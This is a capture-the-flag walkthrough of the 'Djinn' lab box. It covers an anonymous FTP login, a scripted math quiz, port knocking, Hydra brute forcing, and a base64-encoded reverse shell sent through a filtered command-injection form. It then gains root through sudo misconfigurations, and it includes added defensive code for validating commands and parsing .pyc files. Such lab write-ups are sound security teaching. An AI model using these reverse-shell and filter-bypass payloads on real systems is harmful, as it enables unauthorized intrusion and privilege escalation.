HMV Djinn
Todd

Information Gathering

Nmap scan

IP=192.168.0.183
nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 04:41 EDT
Nmap scan report for 192.168.0.183
Host is up (0.00035s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
MAC Address: 08:00:27:97:C1:B4 (Oracle VirtualBox virtual NIC)

There's an FTP service; let's take a look and check whether anonymous login is allowed.
Port 22 is filtered, oddly, so it looks like we can't SSH straight in.

FTP

ftp $IP
Connected to 192.168.0.183.
220 (vsFTPd 3.0.3)
Name (192.168.0.183:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||48637|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> get creds.txt
ftp> get game.txt
ftp> get message.txt
ftp> exit
221 Goodbye.

Download them and take a look.

┌──(root㉿kali)-[~/Downloads/Djinn]
└─# cat creds.txt
nitu:81299

┌──(root㉿kali)-[~/Downloads/Djinn]
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.

┌──(root㉿kali)-[~/Downloads/Djinn]
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.

Let's try port 1337.

└─# telnet $IP 1337
Trying 192.168.0.183...
Connected to 192.168.0.183.
Escape character is '^]'.
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|


Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(4, '/', 2)
>

It's a math quiz, so let's write a Python script for it.

import ast
import operator
import re
import socket

HOST, PORT = '192.168.0.183', 1337

# The game sends each question as a Python tuple, e.g. (4, '/', 2).
# Parse it with ast.literal_eval and a small operator table instead of
# eval()ing text received from the network.
QUESTION_RE = re.compile(r"\(\d[^)]*\)")
OPS = {
    '+': operator.add, '-': operator.sub, '*': operator.mul,
    '/': operator.truediv, '//': operator.floordiv, '%': operator.mod,
    '**': operator.pow,
}


def get_question(s):
    """Return the next question tuple, None if this chunk had none,
    or raise ConnectionError once the server has closed the socket."""
    data = s.recv(1024).decode()
    if not data:                      # recv() returns '' on EOF
        raise ConnectionError("server closed the connection")
    print("d:" + data)
    m = QUESTION_RE.search(data)
    if m:
        return ast.literal_eval(m.group(0))   # -> (4, '/', 2)
    return None


def solve(question):
    a, op, b = question
    return str(OPS[op](a, b))         # same value eval() produced, e.g. '2.0' for 4 / 2


def send_answer(s, answer):
    print("a:" + answer)
    s.sendall(answer.encode() + b'\n')


def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    try:
        while True:
            question = get_question(s)
            if not question:          # chunk without a question (banner, prompt)
                continue
            print("q:" + str(question))
            send_answer(s, solve(question))
    except ConnectionError:
        pass                          # the last chunk carried the gift, printed above
    finally:
        s.close()


if __name__ == '__main__':
    main()

We get the hint: Here is your gift, I hope you know what to do with it: 1356, 6784, 3409
Recalling that port 22 was filtered, could this be port knocking? Let's try.

knock $IP 1356 6784 3409
nmap $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 20:39 EDT
Nmap scan report for 192.168.0.183
Host is up (0.00037s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
MAC Address: 08:00:27:97:C1:B4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.51 seconds

Exploitation

Sure enough, 22 is open now, so let's follow the hints. The user is probably nitish81299, and the password might be nitu:81299 or 81299. I tried a few by hand without luck, so on to Hydra.

printf 'nitu\nnitish\nnitish81299\n' > userlist.txt
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt ssh://$IP

It ran for quite a while with nothing to show for it. I stopped it and took a break.

Then I wondered whether I had missed ports: none of the ports in the knock sequence showed up in my scan. Scan again with the usual flags added.

nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 21:10 EDT
Nmap scan report for 192.168.0.183
Host is up (0.00033s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 08:00:27:97:C1:B4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.64 seconds

Sure enough, there is also a web service on port 7331. Browse it by hand while running a scan in parallel.

Manual browsing was over quickly: there's only a home page, and its links don't go anywhere.

gobuster dir -u http://$IP:7331 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,html,txt,7z,zip
/wish (Status: 200) [Size: 385]
/genie (Status: 200) [Size: 1676]

Opening /wish and submitting id returned:

<p>uid=33(www-data) gid=33(www-data) groups=33(www-data)</p>

Looks like we have RCE; let's try it.
pwncat-cs -lp 1234
Submitting nc -e /bin/bash 192.168.0.30 1234 unexpectedly returned Wrong choice of words, so it looks like there is a filter to get around.
If nc doesn't work, let's try bash.

/bin/bash -i >& /dev/tcp/192.168.0.30/1234 0>&1 still fails. If it's keyword filtering, let's try encoding.

Webshell

echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.30/1234 0>&1'" | base64
L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4zMC8xMjM0IDA+JjEnCg==

Submitting echo 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4zMC8xMjM0IDA+JjEnCg==' | base64 -d | bash works.

Note: since the form is POSTed as application/x-www-form-urlencoded, all of the submissions above need to be URL-encoded.

Privilege Escalation

Information Gathering

(remote) www-data@djinn:/opt/80$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@djinn:/opt/80$ sudo -l
[sudo] password for www-data:
(remote) www-data@djinn:/opt/80$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
nitish:x:1001:1001::/home/nitish:/bin/bash

Let's look at app.py.

cat app.py

import subprocess

from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"

RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]

def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True

    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")

@app.route("/wish", methods=['POST', "GET"])
def wish():
    execute = request.form.get("cmd")
    if execute:
        if validate(execute):
            output = subprocess.Popen(execute, shell=True,
                                      stdout=subprocess.PIPE).stdout.read()
        else:
            output = "Wrong choice of words"

        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')

@app.route('/genie', methods=['GET', 'POST'])
def genie():
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = "It's not that hard"

    return render_template('genie.html', file=page)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)

We see a file path, /home/nitish/.dev/creds.txt; let's see what's in it.

(remote) www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
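The reason the base64 wrapper got past /wish is visible in validate() above: it compares every single character of the command against a blocklist, so a pipeline built from letters, digits, spaces, a dash and pipes never trips it, and whatever survives is handed to Popen(shell=True). The following is an added example, not code from the box or the write-up. It reproduces the box's validate() next to a hardened replacement that uses an allowlist of fixed argv vectors and runs them without a shell; the ALLOWED table and the binary paths in it are assumptions for the demonstration, and the sample inputs are the write-up's probes (with a benign base64 wrapper of the same shape as the one that worked).

```python
import shlex
import subprocess

# Copy of the box's validate() from app.py, kept here so the two filters
# can be compared side by side.
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    """Original blocklist. It rejects a command only if one of its characters
    equals an RCE entry, so the four-letter entry "eval" can never match, and
    pipes, dashes and letters are all allowed. The first branch returns True
    before the character check runs, a second, independent hole."""
    if CREDS in cmd and "cat" not in cmd:
        return True
    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False


# Hardened replacement (added here, not from the box): an allowlist of fixed
# argv vectors, no shell, and no user-controlled arguments at all.
# The binary paths are assumed for the example.
ALLOWED = {
    "id": ["/usr/bin/id"],
    "uptime": ["/usr/bin/uptime"],
    "date": ["/bin/date"],
}


def hardened_validate(cmd):
    """Return the argv to run, or None if the request is not allowed.
    shlex.split handles quoting; anything beyond a single known word is refused."""
    try:
        words = shlex.split(cmd)
    except ValueError:            # unbalanced quotes
        return None
    if len(words) != 1:
        return None
    return ALLOWED.get(words[0])


def run_wish(cmd):
    """Execute an allowed wish without shell=True; output is size-capped."""
    argv = hardened_validate(cmd)
    if argv is None:
        return "Wrong choice of words"
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout[:4096]


if __name__ == "__main__":
    # Constructed inputs: the probe that worked, the two the blocklist stopped,
    # and a base64 wrapper of the same shape as the one that slipped through
    # (aWQK decodes to "id\n").
    for cmd in ["id",
                "nc -e /bin/bash 192.168.0.30 1234",
                "/bin/bash -i >& /dev/tcp/192.168.0.30/1234 0>&1",
                "echo aWQK | base64 -d | bash"]:
        print(f"{cmd[:40]!r:45} blocklist={validate(cmd)!s:5} "
              f"allowlist={hardened_validate(cmd) is not None}")
```

The allowlist approach also removes the need for the blocklist's character loop entirely: the user never supplies a command string that reaches a shell, only a key into a table of commands the application already decided to offer.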

Privilege escalation: nitish

Log in with it directly.

ssh nitish@$IP
nitish@djinn:~$ id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie

nitish can run /usr/bin/genie as sam; let's look at that file.

nitish@djinn:~$ file /usr/bin/genie
/usr/bin/genie: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=3f0b0d4d3dacca65084b0fbe690cac95d143e61a, not stripped

nitish@djinn:~$ sudo -u sam /usr/bin/genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish

sudo -u sam /usr/bin/genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish

I know you've came to me bearing wishes in mind. So go ahead make your wishes.

positional arguments:
wish Enter your wish

optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command


sudo -u sam /usr/bin/genie -e /bin/bash id
You are a noob hacker!!

nitish@djinn:~$ sudo -u sam /usr/bin/genie -e id id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

Got mocked. With -e some individual commands can be run, but it isn't clear how exactly it is meant to be used. Let's check whether there's a man page and look at the details.

man genie
NAME
genie - Make a wish

SYNOPSIS
genie [-h] [-g] [-p SHELL] [-e EXEC] wish

DESCRIPTION
genie would complete all your wishes, even the naughty ones.

We all dream of getting those crazy privelege escalations, this will even help you acheive
that.

OPTIONS
wish

This is the wish you want to make .

-g, --god

Sometime we all would like to make a wish to god, this option let you make wish
directly to God;

Though genie can't gurantee you that your wish will be heard by God, he's a busy man
you know;

-p, --shell

Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"

-e, --exec

Execute command on someone else computer is just too damn fun, but this comes with
some restrictions.

-cmd

You know sometime all you new is a damn CMD, windows I love you.

SEE ALSO
mzfr.github.io

There is also a cmd parameter.
And the author's blog: https://blog.mzfr.me/

Privilege escalation: sam

nitish@djinn:~$ sudo -u sam /usr/bin/genie -cmd id
my man!!
$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ /bin/bash
sam@djinn:~$
sam@djinn:~$ id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
sam@djinn:~$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago

sam can run /root/lago as root; let's look at that file.

sam@djinn:~$ file /root/lago
/root/lago: cannot open `/root/lago' (Permission denied)
sam@djinn:~$ ls -l /root/lago
ls: cannot access '/root/lago': Permission denied

Can't see anything.

sam@djinn:~$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
Enter the full of the file to read: /etc/shadow
User root is not allowed to read /etc/shadow
sam@djinn:~$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
Enter the full of the file to read: /root/lago
User root is not allowed to read /root/lago

It refuses to read anything. But when I pressed Ctrl+C at the input prompt, I found a hint.

sam@djinn:/opt$ sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:^CTraceback (most recent call last):
File "/root/lago", line 161, in <module>
main(options())
File "/root/lago", line 111, in options
choice = input("Enter your choice:")
KeyboardInterrupt

So this thing is written in Python, and earlier the directories under /opt all contained .pyc files. Let's see if we can find a password.
In sam's home directory, /home/sam, I found:

sam@djinn:/home/sam$ ls -al
total 36
drwxr-x--- 4 sam sam 4096 Nov 14 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 417 Nov 14 2019 .bash_history
-rw-r--r-- 1 root root 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 sam sam 3771 Oct 20 2019 .bashrc
drwx------ 2 sam sam 4096 Nov 11 2019 .cache
drwx------ 3 sam sam 4096 Oct 20 2019 .gnupg
-rw-r--r-- 1 sam sam 807 Oct 20 2019 .profile
-rw-r--r-- 1 sam sam 1749 Nov 7 2019 .pyc
-rw-r--r-- 1 sam sam 0 Nov 7 2019 .sudo_as_admin_successful

A very promising-looking file name, but its size is 0. And what is that .pyc?

sam@djinn:/home/sam$ cat .pyc

��]c@s}ddlmZddlmZddlmZd�Zd�Zd�d�Z �Z
e
d krye
e ��nd
S(
i����(tgetuser(tsystem(trandintcCs dGHdS(NsWorking on it!! ((((s/home/mzfr/scripts/exp.pyt
naughtyboscCsBtdd�}dGHtd�}||kr9td�ndGHdS(Niies"Choose a number between 1 to 100: sEnter your number: s/sin/shsBetter Luck next time(RtinputR(tnumts((s/home/mzfr/scripts/exp.pytguessit


cCs(t�}td�}d||fGHdS(Ns$Enter the full of the file to read: s!User %s is not allowed to read %s(RR(tusertpath((s/home/mzfr/scripts/exp.pyt readfiless
cCs/dGHdGHdGHdGHdGHttd��}|S(NsWhat do you want to do ?s1 - Be naughtys2 - Guess the numbers3 - Read some damn files4 - WorksEnter your choice: (tintR(tchoice((s/home/mzfr/scripts/exp.pytoptionsscCs_|dkrt�nE|dkr,t�n/|dkrBt�n|dkrVdGHndGHdS(Niiiiswork your ass off!!s"Do something better with your life(RRR
(top((s/home/mzfr/scripts/exp.pytmain's






__main__N(
tgetpassRtosRtrandomRRRR
R__name__(((s/home/mzfr/scripts/exp.py<module>s

It looks like this is the compiled version of /root/lago. Roughly, the useful parts are the guess-the-number and read-file sections (those two are the longer ones).
Is it asking me to guess a number? I could just keep guessing the same number and keep running it until it's right.
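The dump above was read by eye from cat output. A more reliable way to triage a compiled Python file without running it is to check the header magic and then walk the marshalled code object for its string constants and referenced names (the system call and the shell path visible in the dump are exactly the kind of thing this surfaces). The following is an added example, not code from the write-up or the box: it builds a small .pyc from a constructed source modelled on the strings in the dump, then parses it back. The header layout differs between interpreter versions (Python 2 used an 8-byte header, 3.7 and later use 16 bytes), so the parser refuses any file whose magic does not match the running interpreter rather than feeding foreign marshal data to marshal.loads, and it never exec()s the code object it recovers.

```python
import importlib.util
import marshal
import struct
import time
import types

# Constructed stand-in for the menu program whose strings appear in the dump
# (hypothetical source written for this example, not the box's real file).
SAMPLE_SOURCE = '''
from os import system
from random import randint

def guessit():
    num = randint(1, 100)
    print("Choose a number between 1 to 100: ")
    s = int(input("Enter your number: "))
    if num == s:
        system("/bin/sh")
    else:
        print("Better Luck next time")

def main(choice):
    if choice == 2:
        guessit()
'''


def build_pyc(source: str) -> bytes:
    """Compile source and wrap it in the 16-byte header CPython >= 3.7 writes:
    magic, flags, source mtime, source size, then the marshalled code object."""
    code = compile(source, "exp.py", "exec")
    header = importlib.util.MAGIC_NUMBER
    header += struct.pack("<I", 0)                  # flags: 0 = timestamp-based pyc
    header += struct.pack("<I", int(time.time()))   # source mtime
    header += struct.pack("<I", len(source))        # source size
    return header + marshal.dumps(code)


def parse_pyc(blob: bytes):
    """Return the code object, or None when the magic belongs to another
    interpreter version (marshal data from other versions must not be loaded)."""
    if blob[:4] != importlib.util.MAGIC_NUMBER:
        return None
    return marshal.loads(blob[16:])     # unmarshal only; the code is never exec()ed


def walk_constants(code: types.CodeType, found=None):
    """Recursively collect string constants and referenced names from a code
    object and every nested function body it contains."""
    if found is None:
        found = {"strings": [], "names": []}
    for c in code.co_consts:
        if isinstance(c, str):
            found["strings"].append(c)
        elif isinstance(c, tuple):      # e.g. the fromlist of a from-import
            found["strings"].extend(x for x in c if isinstance(x, str))
        elif isinstance(c, types.CodeType):
            walk_constants(c, found)
    for n in code.co_names:
        if n not in found["names"]:
            found["names"].append(n)
    return found


def summarize_pyc(blob: bytes):
    """Magic check plus constant walk; None means 'wrong interpreter, not parsed'."""
    code = parse_pyc(blob)
    if code is None:
        return None
    return walk_constants(code)


if __name__ == "__main__":
    info = summarize_pyc(build_pyc(SAMPLE_SOURCE))
    print("names:  ", info["names"])
    print("strings:", info["strings"])
```

On the sample this lists system, randint and input among the names and the shell path among the strings, which is the same triage the dump allowed by eye. For a file from another interpreter version, summarize_pyc returns None; the right move is then to run the matching interpreter version's marshal in a sandbox, or fall back to a strings-style scan of the raw bytes.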

while true; do
    sudo -u root /root/lago
done

After stubbornly entering 2 over and over, suddenly:

# pwd
/home
# id
uid=0(root) gid=0(root) groups=0(root)

Absurd.
